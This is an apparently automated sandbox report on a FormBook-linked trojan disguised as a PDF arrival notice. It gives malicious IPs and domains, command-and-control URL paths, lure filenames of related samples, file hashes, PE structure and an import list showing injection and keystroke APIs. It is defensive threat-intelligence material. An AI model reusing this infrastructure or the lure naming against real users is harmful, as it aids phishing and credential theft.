https://34.92.79.175:19817/register	ktmutil.exe, 00000007.00000002.3009265180.0000000004594000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3010819825.00000000069A0000.00000004.00000800.00020000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000002.3008268012.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2439887561.00000000388F4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
203.161.49.193	www.futurevision.life	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
154.92.61.37	www.huiguang.xyz	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
198.252.98.54	migorengya8.click	Canada	20068	HAWKHOSTCA	true
3.33.130.190	mcfunding.org	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557320
Start date and time:	2024-11-18 03:21:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Arrival Notice_pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/3@7/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 52 Number of non-executed functions: 294
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
21:23:19	API Interceptor	1723526x Sleep call for process: ktmutil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
203.161.49.193	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	www.futurevision.life/hxmz/
	Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	FormBook	Browse	www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
	Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.eco-tops.website/n54u/
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	www.futurevision.life/hxmz/
	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.harmonid.life/aq3t/
	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.harmonid.life/aq3t/
	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	www.fitlifa.xyz/6tsn/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.simplek.top/ep69/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.simplek.top/ep69/
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	www.futurevision.life/hxmz/
154.92.61.37	rGO880-PDF.exe	Get hash	malicious	FormBook	Browse	www.huiguang.xyz/8hcr/
198.252.98.54	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	www.migorengya8.click/y3dc/
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	www.migorengya8.click/y3dc/
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	www.migorengya8.click/y3dc/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.huiguang.xyz	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	rGO880-PDF.exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	154.92.61.37
www.futurevision.life	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	203.161.49.193
	Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	FormBook	Browse	203.161.49.193
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	203.161.49.193
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	203.161.49.193

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HAWKHOSTCA	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
POWERLINE-AS-APPOWERLINEDATACENTERHK	botx.spc.elf	Get hash	malicious	Mirai	Browse	156.252.113.254
	Certificate 11-142024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	xd.spc.elf	Get hash	malicious	Mirai	Browse	45.202.220.136
	rDocument11-142024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	rGO880-PDF.exe	Get hash	malicious	FormBook	Browse	154.92.61.37
	meerkat.arm.elf	Get hash	malicious	Mirai	Browse	160.124.107.230
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	107.151.95.239
	glued.hta	Get hash	malicious	FormBook	Browse	154.215.72.110
	xBzBOQwywT.exe	Get hash	malicious	FormBook	Browse	156.242.132.82
VNPT-AS-VNVNPTCorpVN	protected.ps1	Get hash	malicious	Unknown	Browse	202.92.4.57
	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	203.161.49.193
	yakuza.arm4.elf	Get hash	malicious	Mirai	Browse	14.186.221.243
	yakuza.ppc.elf	Get hash	malicious	Mirai	Browse	14.248.237.190
	http://weststoneltd.technolutionszzzz.net	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	203.161.41.21
	x86.elf	Get hash	malicious	Unknown	Browse	113.189.0.97
	ppc.elf	Get hash	malicious	Mirai	Browse	14.248.199.46
	PO-DC13112024_pdf.vbs	Get hash	malicious	Unknown	Browse	203.161.46.205
	qkbfi86.elf	Get hash	malicious	Mirai	Browse	14.238.234.234
	botnet.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	14.244.97.178

Process:	C:\Windows\SysWOW64\ktmutil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut65C5.tmp

Download File

Process:	C:\Users\user\Desktop\Arrival Notice_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.993030508039963
Encrypted:	true
SSDEEP:	6144:MDxa0aT8NCPEDp+G9v/EBqUVs636ylNHe28NA:MU05Syg2MRVh36yXHh8y
MD5:	266C0C9ECA5F201DACDB448587FF7477
SHA1:	9C5A3D145E2840654994E599930E7191F95B525D
SHA-256:	88E94298004918D8DB3E152C8B0C02F343A5C70536B3374559CB52AE5F29C779
SHA-512:	A27205F6C6255676430382F6946B34E9D4570B8F693128ED2E430242F915D9AD36C5751AEA7E534A4D3465CF136AF5134B436BF99B42CB9FF3C6B0C1D5BAC783
Malicious:	false
Reputation:	low
Preview:	.m...DWAIm..O...}.5K...G_...H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5.7FL?[.OI.A.g.0..`.]!Df<C+03(XhT'"_+#a+PhE3".-9a.z..+#U!yLD?l7FL1DWA04A.{,V.j!..uW!.+...sU/.\.k!..R...$0..\+_{,V.WAI5H7FLa.WA.4I7...%WAI5H7FL.DU@B4C7F.5DWAI5H7FL.PWAI%H7F<5DWA.5H'FL1FWAO5H7FL1DQAI5H7FL14SAI7H7FL1DUA..H7VL1TWAI5X7F\1DWAI5X7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7h8T<#AI5.eBL1TWAIaL7F\1DWAI5H7FL1DWAi5HWFL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5

C:\Users\user\AppData\Local\Temp\peristeronic

Download File

Process:	C:\Users\user\Desktop\Arrival Notice_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.993030508039963
Encrypted:	true
SSDEEP:	6144:MDxa0aT8NCPEDp+G9v/EBqUVs636ylNHe28NA:MU05Syg2MRVh36yXHh8y
MD5:	266C0C9ECA5F201DACDB448587FF7477
SHA1:	9C5A3D145E2840654994E599930E7191F95B525D
SHA-256:	88E94298004918D8DB3E152C8B0C02F343A5C70536B3374559CB52AE5F29C779
SHA-512:	A27205F6C6255676430382F6946B34E9D4570B8F693128ED2E430242F915D9AD36C5751AEA7E534A4D3465CF136AF5134B436BF99B42CB9FF3C6B0C1D5BAC783
Malicious:	false
Reputation:	low
Preview:	.m...DWAIm..O...}.5K...G_...H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5.7FL?[.OI.A.g.0..`.]!Df<C+03(XhT'"_+#a+PhE3".-9a.z..+#U!yLD?l7FL1DWA04A.{,V.j!..uW!.+...sU/.\.k!..R...$0..\+_{,V.WAI5H7FLa.WA.4I7...%WAI5H7FL.DU@B4C7F.5DWAI5H7FL.PWAI%H7F<5DWA.5H'FL1FWAO5H7FL1DQAI5H7FL14SAI7H7FL1DUA..H7VL1TWAI5X7F\1DWAI5X7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7h8T<#AI5.eBL1TWAIaL7F\1DWAI5H7FL1DWAi5HWFL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5H7FL1DWAI5

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.156346308123037
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Arrival Notice_pdf.exe
File size:	1'223'168 bytes
MD5:	1ff21e9055f0e4e51b6061abbdb371c5
SHA1:	ba16eb2d6cc767667b60fd408b2aaadb9291970b
SHA256:	a949711a2548287c4da624ebf136e41df1deba6b67783bf3dc3a30fded99d12c
SHA512:	583132bd0ea36eab68a7d124c909d34eb6e1e3d253a0ffd0286b0bd4af69a35be161620d81706acd1c7e1f9cece3f3732f43113b8cbea66e3148b2883d0a7e5a
SSDEEP:	24576:Rtb20pkaCqT5TBWgNQ7au6kwCreV7Wsp0r7SzeNMvXY6A:iVg5tQ7au6UI+6KNMQ5
TLSH:	5D45C01363DE8364C7B25273BA1AB701BEBB782506A5F56B2FD4093DF820162521E773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673A7771 [Sun Nov 17 23:08:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F5B8CF252EFh
jmp 00007F5B8CF18304h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F5B8CF1848Ah
cmp edi, eax
jc 00007F5B8CF187EEh
bt dword ptr [004C0158h], 01h
jnc 00007F5B8CF18489h
rep movsb
jmp 00007F5B8CF1879Ch
cmp ecx, 00000080h
jc 00007F5B8CF18654h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F5B8CF18490h
bt dword ptr [004BA370h], 01h
jc 00007F5B8CF18960h
bt dword ptr [004C0158h], 00000000h
jnc 00007F5B8CF1862Dh
test edi, 00000003h
jne 00007F5B8CF1863Eh
test esi, 00000003h
jne 00007F5B8CF1861Dh
bt edi, 02h
jnc 00007F5B8CF1848Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F5B8CF18493h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F5B8CF184E5h
bt esi, 03h
jnc 00007F5B8CF18538h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x6190c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x126000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x6190c	0x61a00	6a35911ccb6c36d92caf1c5d27609484	False	0.9327859915172856	data	7.903862981800158	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x126000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x58c13	data			1.0003328391176738
RT_GROUP_ICON	0x1253cc	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x125444	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x125458	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12546c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x125480	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12555c	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, 